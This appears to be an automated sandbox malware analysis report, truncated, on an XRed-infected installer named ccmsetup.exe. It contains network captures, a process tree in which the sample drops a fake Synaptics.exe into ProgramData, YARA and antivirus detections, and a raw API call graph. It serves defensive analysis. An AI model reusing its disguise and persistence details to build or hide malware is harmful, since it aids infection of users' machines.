                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:10 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:10 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1403
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                        ETag: "0x8DC582BDC2EEE03"
                                                                                        x-ms-request-id: eed2a8f6-b01e-0001-60d2-4546e2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215110Z-1746fd949bdtlp5chC1EWRq1v400000003ag00000000354s
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:10 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        149192.168.2.54995913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:10 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:10 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:10 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1366
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                        ETag: "0x8DC582BEA414B16"
                                                                                        x-ms-request-id: 3ad1336c-301e-0099-6986-466683000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215110Z-1746fd949bd54zxghC1EWRzre400000003e000000000ztnn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:10 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:16:49:56
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\Desktop\ccmsetup.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\ccmsetup.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:4'873'728 bytes
                                                                                        MD5 hash:823444545911FD17E953437B7C712F2F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:16:49:57
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\Desktop\._cache_ccmsetup.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\._cache_ccmsetup.exe"
                                                                                        Imagebase:0x570000
                                                                                        File size:4'102'192 bytes
                                                                                        MD5 hash:169E238A8E29445C319F934362361D28
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:16:49:58
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                        Imagebase:0x400000
                                                                                        File size:771'584 bytes
                                                                                        MD5 hash:020E869138373254D25D50294CEB45AF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 92%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:16:50:00
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                        Imagebase:0x1a0000
                                                                                        File size:53'161'064 bytes
                                                                                        MD5 hash:4A871771235598812032C822E6F68F19
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:16:50:11
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:771'584 bytes
                                                                                        MD5 hash:020E869138373254D25D50294CEB45AF
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Borland Delphi
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:16:50:52
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11516
                                                                                        Imagebase:0x5f0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:16:51:04
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11544
                                                                                        Imagebase:0x5f0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:26
                                                                                        Start time:16:51:18
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 1912
                                                                                        Imagebase:0x5f0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:29
                                                                                        Start time:16:51:19
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 4528
                                                                                        Imagebase:0x5f0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:34
                                                                                        Start time:16:51:19
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11368
                                                                                        Imagebase:0x5f0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:36
                                                                                        Start time:16:51:19
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11488
                                                                                        Imagebase:0x5f0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.3%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:1.7%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:90
                                                                                          execution_graph 75422 5f4dae 75423 5f4dc0 75422->75423 75424 5f4dc4 75423->75424 75425 5f4de2 75423->75425 75439 59f35b 75424->75439 75429 59ea94 75425->75429 75428 5f4de0 75430 59eaf3 75429->75430 75431 59eaa5 75429->75431 75461 5d0c66 67 API calls 2 library calls 75430->75461 75433 59eaaa 75431->75433 75434 59eab5 75431->75434 75451 59e813 75433->75451 75437 59eab3 75434->75437 75457 59ef10 75434->75457 75437->75428 75440 59f372 75439->75440 75441 59f3e5 75439->75441 75443 59f37f 75440->75443 75444 59f396 75440->75444 75487 5d0c94 67 API calls 2 library calls 75441->75487 75481 59ff6c 67 API calls 75443->75481 75446 59ea94 71 API calls 75444->75446 75445 59f3ef 75450 59f394 75446->75450 75448 59f387 75482 59ffa1 75448->75482 75450->75428 75452 59e81f __EH_prolog3_catch 75451->75452 75462 59f078 75452->75462 75454 59ef10 2 API calls 75456 59e8f9 75454->75456 75455 59e87e 75455->75454 75456->75437 75458 59ef40 75457->75458 75459 59ef23 75457->75459 75458->75437 75459->75458 75476 5f3f60 75459->75476 75463 59f096 75462->75463 75464 59f0a8 75463->75464 75469 5f3f50 75463->75469 75467 59f0ac 75464->75467 75475 5d21c0 RaiseException 75464->75475 75467->75455 75468 59f0cd 75470 615949 75469->75470 75471 615967 VirtualAlloc 75470->75471 75472 615988 RtlAllocateHeap 75470->75472 75473 615999 75471->75473 75474 61597c 75471->75474 75472->75473 75473->75464 75474->75473 75475->75468 75477 6159aa 75476->75477 75478 6159eb 75477->75478 75479 6159dd VirtualFree 75477->75479 75480 6159d0 RtlFreeHeap 75477->75480 75478->75458 75479->75478 75480->75478 75481->75448 75483 5a001c 75482->75483 75486 59ffb5 75482->75486 75488 5d0c94 67 API calls 2 library calls 75483->75488 75485 5a0026 75486->75450 75487->75445 75488->75485 75489 5713a5 75494 6158bf HeapCreate 75489->75494 75493 5713b4 75504 5fc35f 75494->75504 75496 6158df 75497 615918 75496->75497 75498 615921 GetProcessHeap 75496->75498 75500 6158e7 HeapQueryInformation 75496->75500 75497->75498 75499 5713aa 75497->75499 75498->75499 75503 5d0e41 66 API calls 75499->75503 75500->75497 75501 6158fe 75500->75501 75501->75497 75502 615906 HeapSetInformation 75501->75502 75502->75497 75503->75493 75505 5fc368 75504->75505 75506 5fc383 75504->75506 75509 5fe471 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW ___crtMessageBoxW 75505->75509 75506->75496 75508 5fc376 75508->75496 75509->75508 75510 5d4f49 75511 5d4f55 ___lock_fhandle 75510->75511 75534 5dbb34 75511->75534 75513 5d4f5c 75515 5d4f8a DecodePointer 75513->75515 75522 5d5035 75513->75522 75524 5d5024 75513->75524 75517 5d5015 75515->75517 75518 5d4fa1 DecodePointer 75515->75518 75516 5d4edf __initterm 59 API calls 75516->75522 75549 5d4edf 75517->75549 75527 5d4fb1 75518->75527 75520 5d5072 ___lock_fhandle 75541 5d5063 75522->75541 75524->75516 75525 5d4fbe EncodePointer 75525->75527 75526 5d505a 75528 5d5063 75526->75528 75546 5d4dbf 75526->75546 75527->75517 75527->75525 75530 5d4fce DecodePointer EncodePointer 75527->75530 75531 5d5070 75528->75531 75553 5dbc9e LeaveCriticalSection 75528->75553 75533 5d4fe0 DecodePointer DecodePointer 75530->75533 75533->75527 75535 5dbb58 EnterCriticalSection 75534->75535 75536 5dbb45 75534->75536 75535->75513 75554 5dbbbc 66 API calls 9 library calls 75536->75554 75538 5dbb4b 75538->75535 75555 5d4dd5 66 API calls 4 library calls 75538->75555 75540 5dbb57 75540->75535 75542 5d5069 75541->75542 75543 5d5043 75541->75543 75556 5dbc9e LeaveCriticalSection 75542->75556 75543->75520 75545 5dbc9e LeaveCriticalSection 75543->75545 75545->75526 75557 5d4d8b GetModuleHandleExW 75546->75557 75550 5d4f10 75549->75550 75551 5d4f00 75549->75551 75550->75524 75551->75550 75561 571178 75551->75561 75553->75531 75554->75538 75555->75540 75556->75543 75558 5d4dbb ExitProcess 75557->75558 75559 5d4da4 GetProcAddress 75557->75559 75559->75558 75560 5d4db6 75559->75560 75560->75558 75562 571184 __EH_prolog3 75561->75562 75567 615355 75562->75567 75564 571198 75571 5d0e41 66 API calls 75564->75571 75566 5711a6 75566->75551 75568 615361 __EH_prolog3 75567->75568 75572 619e0d 75568->75572 75570 61536b 75570->75564 75571->75566 75573 619e40 75572->75573 75574 619e2c GetSystemInfo 75572->75574 75573->75570 75574->75573 75575 58b6ad 75576 58b6bc __EH_prolog3_catch_GS 75575->75576 75577 58b719 GetCommandLineW CommandLineToArgvW 75576->75577 75578 58b767 GetLastError 75577->75578 75580 58b7d2 75577->75580 75579 58b786 75578->75579 75581 58b7b5 75579->75581 75582 58b78a GetCurrentThreadId 75579->75582 75585 58b80d 75580->75585 75683 592624 GetCurrentThreadId 75580->75683 75603 58b7ca 75581->75603 75750 5f0dba 6 API calls 75581->75750 75582->75581 75588 58b842 75585->75588 75591 58b92c 75585->75591 75586 59ef10 2 API calls 75587 58c015 75586->75587 75589 59ef10 2 API calls 75587->75589 75682 58b8ff 75588->75682 75686 5b76e6 75588->75686 75590 58c025 75589->75590 75755 5ba3b9 71 API calls __EH_prolog3_GS 75591->75755 75593 58b853 75594 58b912 75593->75594 75610 58b865 75593->75610 75702 586ac2 75594->75702 75595 58bed9 75604 58bf11 LocalFree CommandLineToArgvW 75595->75604 75607 592624 269 API calls 75595->75607 75596 58bed4 75597 58bf5d GetLastError 75596->75597 75598 58bfaf 75596->75598 75602 58bf7c 75597->75602 75598->75603 75794 5f0dba 6 API calls 75598->75794 75601 58b96a 75605 59ef10 2 API calls 75601->75605 75602->75581 75611 58bf84 GetCurrentThreadId 75602->75611 75603->75586 75604->75596 75609 58b981 75605->75609 75612 58bf0e 75607->75612 75756 5f52af 75609->75756 75751 5f41ca 75610->75751 75611->75598 75612->75604 75614 58be47 75617 59ef10 2 API calls 75614->75617 75621 58be62 75617->75621 75618 58ba31 75623 5f52af 68 API calls 75618->75623 75619 58b996 75760 5b64db 99 API calls __EH_prolog3_catch 75619->75760 75620 58b89d 75625 5f41ca 76 API calls 75620->75625 75621->75595 75630 58be68 75621->75630 75622 58bd84 GetCurrentThreadId 75622->75682 75626 58ba3e 75623->75626 75633 58b8af 75625->75633 75626->75682 75764 5b64db 99 API calls __EH_prolog3_catch 75626->75764 75627 58b9dd 75761 5f567f 75627->75761 75629 5f52af 68 API calls 75629->75682 75630->75596 75634 592624 269 API calls 75630->75634 75645 58be9f 75630->75645 75632 58ba4f 75635 58ba5b 75632->75635 75669 58bad7 75632->75669 75637 59ef10 2 API calls 75633->75637 75634->75645 75650 58ba96 75635->75650 75651 58ba6a GetCurrentThreadId 75635->75651 75636 58b99f 75636->75627 75641 592624 269 API calls 75636->75641 75642 58b8d8 75637->75642 75638 59ef10 RtlFreeHeap VirtualFree 75638->75682 75639 58bbd5 75644 58bc0a 75639->75644 75655 5f567f 269 API calls 75639->75655 75641->75627 75643 59ef10 2 API calls 75642->75643 75646 58b8ea 75643->75646 75648 5f52af 68 API calls 75644->75648 75645->75596 75647 592624 269 API calls 75645->75647 75654 59ef10 2 API calls 75646->75654 75647->75596 75657 58bc26 75648->75657 75649 58bba3 75649->75639 75662 5f567f 269 API calls 75649->75662 75653 59ef10 2 API calls 75650->75653 75651->75650 75652 58be25 75656 59ef10 2 API calls 75652->75656 75660 58baab 75653->75660 75654->75682 75655->75644 75656->75614 75661 5f52af 68 API calls 75657->75661 75657->75682 75664 59ef10 2 API calls 75660->75664 75666 58bc3b 75661->75666 75662->75639 75663 5f567f 269 API calls 75663->75682 75668 58babd 75664->75668 75672 5f52af 68 API calls 75666->75672 75666->75682 75671 58bacf 75668->75671 75765 5f0dba 6 API calls 75668->75765 75669->75639 75669->75649 75670 58bb27 75669->75670 75766 5d1bbb 75669->75766 75776 5a19aa 329 API calls 75669->75776 75777 5d1d29 68 API calls 3 library calls 75669->75777 75673 59ef10 2 API calls 75670->75673 75671->75603 75675 58bfff LocalFree 75671->75675 75676 58bc50 75672->75676 75673->75660 75675->75603 75676->75682 75778 5f646b 75676->75778 75678 58bc82 75679 58bcc9 75678->75679 75680 58bc9d GetCurrentThreadId 75678->75680 75678->75682 75681 59ef10 2 API calls 75679->75681 75680->75679 75681->75682 75682->75595 75682->75596 75682->75614 75682->75622 75682->75629 75682->75638 75682->75652 75682->75663 75791 5a234d 346 API calls __EH_prolog3_catch_GS 75682->75791 75792 5a19c8 279 API calls 75682->75792 75793 5b64db 99 API calls __EH_prolog3_catch 75682->75793 75795 5f2175 75683->75795 75685 592647 75685->75585 75687 5b76f2 __EH_prolog3 75686->75687 76233 5f663a 75687->76233 75689 5b76fa 75690 5f52cb 67 API calls 75689->75690 75691 5b7711 75690->75691 76237 5b183e 75691->76237 75695 5b7730 75696 5b7772 75695->75696 76268 5f6fe7 82 API calls __EH_prolog3_catch 75695->76268 76262 5f6690 75696->76262 75699 5b7780 75699->75593 75700 5b7744 75700->75696 75701 592624 269 API calls 75700->75701 75701->75696 75703 586ad1 __EH_prolog3_catch_GS 75702->75703 75704 586b6c 75703->75704 75705 5f52af 68 API calls 75703->75705 75708 586c63 75704->75708 76278 6422a5 75704->76278 75705->75704 76399 643299 581 API calls __EH_prolog3_catch_GS 75708->76399 75711 586c85 75712 586c91 75711->75712 75713 586cd5 75711->75713 75718 586bff 75712->75718 75720 586ca4 GetCurrentThreadId 75712->75720 76400 59c777 269 API calls 75713->76400 75738 586c14 75718->75738 76398 5f0dba 6 API calls 75718->76398 75720->75718 75722 586de3 76402 588fa7 952 API calls __EH_prolog3_catch_GS 75722->76402 75725 586ce3 75726 592624 269 API calls 75725->75726 75727 586d2a 75725->75727 75726->75727 75727->75722 75730 586d8e 75727->75730 75733 592624 269 API calls 75727->75733 75728 592624 269 API calls 75731 586ec7 75728->75731 76401 59599a 295 API calls __EH_prolog3_catch_GS 75730->76401 76384 578082 75731->76384 75732 586ed9 76392 59ef8c 75732->76392 75733->75730 75736 586df6 75736->75718 75737 586e3d 75736->75737 75740 586e15 GetCurrentThreadId 75736->75740 75737->75738 76403 5f0dba 6 API calls 75737->76403 75738->75728 75738->75731 75740->75737 75742 59ef10 2 API calls 75744 586ef7 75742->75744 75743 586d9c 75743->75718 75743->75722 75745 586dbb GetCurrentThreadId 75743->75745 75746 59ef10 2 API calls 75744->75746 75745->75722 75747 586f05 75746->75747 75748 59ef10 2 API calls 75747->75748 75749 586f14 75748->75749 75749->75682 75750->75603 75752 5f41d6 __EH_prolog3 75751->75752 76582 5f4ccf 75752->76582 75754 5f4208 75754->75620 75755->75601 75757 5f52ba 75756->75757 75758 5d1bbb _W_store_winword 68 API calls 75757->75758 75759 58b98e 75758->75759 75759->75618 75759->75619 75760->75636 76617 5f5dc4 75761->76617 75763 5f5693 75763->75682 75764->75632 75765->75671 75767 5d1c3c 75766->75767 75768 5d1bc7 75766->75768 76644 5d1c4e 68 API calls 4 library calls 75767->76644 75774 5d1bec 75768->75774 76642 5d5999 66 API calls __getptd_noexit 75768->76642 75771 5d1c49 75771->75669 75772 5d1bd3 76643 5d592a 7 API calls _memcpy_s 75772->76643 75774->75669 75775 5d1bde 75775->75669 75776->75669 75777->75669 75779 5f6477 __EH_prolog3_catch_GS 75778->75779 75780 5f6541 75779->75780 75781 5f64b5 75779->75781 75783 5f6552 GetCurrentThreadId 75780->75783 75784 5f64ca 75780->75784 76645 59f4f9 RtlFreeHeap VirtualFree 75781->76645 75783->75784 75786 5f658e 75784->75786 76647 5f0dba 6 API calls 75784->76647 75786->75678 75787 5a0c32 71 API calls 75789 5f64bd 75787->75789 75789->75784 75789->75787 75790 59ef10 2 API calls 75789->75790 76646 5a0532 71 API calls 75789->76646 75790->75789 75791->75682 75792->75682 75793->75682 75794->75603 75796 5f2184 __EH_prolog3_catch_GS 75795->75796 75797 5f21bc TlsGetValue 75796->75797 75798 5f2206 TlsSetValue 75797->75798 75799 5f21f6 75797->75799 75814 5facce 75798->75814 75859 59f417 75799->75859 75801 5f2235 75803 5f229e 75801->75803 75863 5faaed 269 API calls __EH_prolog3_catch 75801->75863 75831 5f12be 75803->75831 75804 5f2364 75804->75685 75807 5f22c7 75810 5f228d 75807->75810 75812 5f22e2 GetCurrentThreadId 75807->75812 75808 5f224c 75808->75803 75809 5f2258 75808->75809 75809->75810 75811 5f2267 GetCurrentThreadId 75809->75811 75813 5f2342 TlsSetValue 75810->75813 75811->75810 75812->75810 75813->75799 75815 5facda __EH_prolog3_catch 75814->75815 75816 5facfc 75815->75816 75817 5fad55 75815->75817 75822 5fad0f GetCurrentThreadId 75816->75822 75824 5fad35 75816->75824 75818 5fad5b 75817->75818 75819 5fad96 75817->75819 75818->75824 75826 5fad6e GetCurrentThreadId 75818->75826 75820 5fad9c 75819->75820 75821 5fadda 75819->75821 75820->75824 75827 5fadaf GetCurrentThreadId 75820->75827 75865 5f4829 91 API calls vswprintf 75821->75865 75822->75824 75829 5fad4c 75824->75829 75864 5f0dba 6 API calls 75824->75864 75825 5fadf4 75825->75829 75866 5f0dba 6 API calls 75825->75866 75826->75824 75827->75824 75829->75801 75832 5f12ca __EH_prolog3_catch_GS 75831->75832 75833 5f12fe 75832->75833 75846 5f1343 75832->75846 75834 5f130e GetCurrentThreadId 75833->75834 75835 5f1331 75833->75835 75834->75835 75836 5f1452 TlsGetValue 75835->75836 75857 5f1520 75835->75857 75837 5f1466 75836->75837 75836->75857 75871 6151b3 14 API calls __EH_prolog3_catch 75837->75871 75838 59ef10 2 API calls 75839 5f152f 75838->75839 75842 59ef10 2 API calls 75839->75842 75841 5f1472 75841->75857 75872 66c86b 75841->75872 75843 5f153e 75842->75843 75843->75807 75846->75835 75867 5925e0 75846->75867 75849 5f13f5 GetCurrentThreadId 75849->75835 75850 5f14a6 TlsSetValue 75851 5f12be 264 API calls 75850->75851 75852 5f14d2 75851->75852 75853 5f14e4 TlsSetValue 75852->75853 75896 5f0b59 82 API calls 2 library calls 75852->75896 75856 66c86b 66 API calls 75853->75856 75856->75857 75857->75838 75860 59f422 75859->75860 75861 5bc737 75860->75861 75862 5f3f60 2 API calls 75860->75862 75861->75804 75862->75861 75863->75808 75864->75829 75865->75825 75866->75829 75868 5925f4 75867->75868 75897 5f19fe 75868->75897 75870 592620 75870->75835 75870->75849 75871->75841 75993 5d6796 75872->75993 75875 5d6796 _rand 66 API calls 75876 5f1489 75875->75876 75877 5f094c 75876->75877 75878 5f095b __EH_prolog3_catch_GS 75877->75878 75879 5f09ca 75878->75879 75880 5f0983 75878->75880 76020 5f165e 75879->76020 75881 5f0996 GetCurrentThreadId 75880->75881 75895 5f09bf 75880->75895 75881->75895 75884 5f0b49 75884->75850 75885 5f09d0 75886 592624 264 API calls 75885->75886 75892 5f0a12 75885->75892 75886->75892 75887 5f0a5a 75888 5f0a63 GetCurrentThread GetThreadTimes GetSystemTimeAsFileTime 75887->75888 75889 5f0ab7 75887->75889 75888->75889 76101 5f2553 70 API calls __EH_prolog3_catch 75889->76101 75891 5f0ac3 75894 5f0ade GetCurrentThreadId 75891->75894 75891->75895 75892->75887 75892->75888 76041 5f99f8 75892->76041 75894->75895 76095 5777ff 75895->76095 75896->75853 75898 5f1a0d __EH_prolog3_catch_GS 75897->75898 75909 5f1ade 75898->75909 75959 5f10f0 75898->75959 75900 5f1b23 75901 5f1b2f WideCharToMultiByte 75900->75901 75900->75909 75902 5f1bbb 75901->75902 75903 5f1b60 GetLastError 75901->75903 75906 5f1c14 WideCharToMultiByte 75902->75906 75972 5bcb46 75902->75972 75905 5f1b87 GetCurrentThreadId 75903->75905 75903->75909 75904 59f417 2 API calls 75907 5f2133 75904->75907 75905->75909 75913 5f1ccf CreateFileW 75906->75913 75914 5f1c55 EnterCriticalSection 75906->75914 75912 59f417 2 API calls 75907->75912 75909->75904 75916 5f214b 75912->75916 75969 57814c 75913->75969 75914->75913 75917 5f1c6b 75914->75917 75915 5f1bd4 75915->75909 75919 5f1bec GetCurrentThreadId 75915->75919 75920 5f216b 75916->75920 75921 5f2159 CloseHandle 75916->75921 75922 57814c CloseHandle 